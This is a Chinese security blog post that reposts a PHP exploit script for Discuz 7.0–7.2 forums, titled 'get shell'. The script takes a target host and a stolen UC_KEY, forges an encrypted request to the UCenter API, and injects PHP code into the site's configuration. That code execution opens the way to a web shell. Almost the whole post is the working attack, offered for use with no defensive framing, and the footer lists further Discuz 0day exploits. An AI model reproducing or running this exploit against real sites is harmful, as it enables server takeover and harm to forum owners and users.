dz~~~~马后炮

2010, November 4, 1:39 PM. oday收藏
Submitted by admin

by:xhm1n9

#!/usr/bin/php
<?php
print_r('
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
');
if ($argc < 3) {
        print_r('
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$uc_key = $argv[2];
$k=time();
$get=array('time'=>$k,'action'=>'updateapps');
$code=encode_arr($get,$uc_key);

$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>                          //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;

send($cmd);
       
function send($cmd)
{
        global $host, $code;

        $message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1\r\n";       //路径看着改
        $message .= "Content-Type: text/xml\r\n";
        $message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
        $message .= $cmd;
       
        $fp = fsockopen($host, 80);
        fputs($fp, $message);
       
        $resp = '';

        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);
       
        return $resp;
}

function encode_arr($get,$uc_key) {
$tmp = '';
foreach($get as $key => $val) {
   $tmp .= '&'.$key.'='.$val;
}
return _authcode($tmp, 'ENCODE', $uc_key);
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);

$result = '';
$box = range(0, 255);

$rndkey = array();
for($i = 0; $i <= 255; $i++) {
   $rndkey[$i] = ord($cryptkey[$i % $key_length]);
}

for($j = $i = 0; $i < 256; $i++) {
   $j = ($j + $box[$i] + $rndkey[$i]) % 256;
   $tmp = $box[$i];
   $box[$i] = $box[$j];
   $box[$j] = $tmp;
}

for($a = $j = $i = 0; $i < $string_length; $i++) {
   $a = ($a + 1) % 256;
   $j = ($j + $box[$a]) % 256;
   $tmp = $box[$a];
   $box[$a] = $box[$j];
   $box[$j] = $tmp;
   $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}

if($operation == 'DECODE') {
   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
    return substr($result, 26);
   } else {
     return '';
    }
} else {
   return $keyc.str_replace('=', '', base64_encode($result));
}

}

?>

 

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 22400, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22260, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16868, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14416, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 45713, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50132, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23211, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15927, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11745, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18621, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):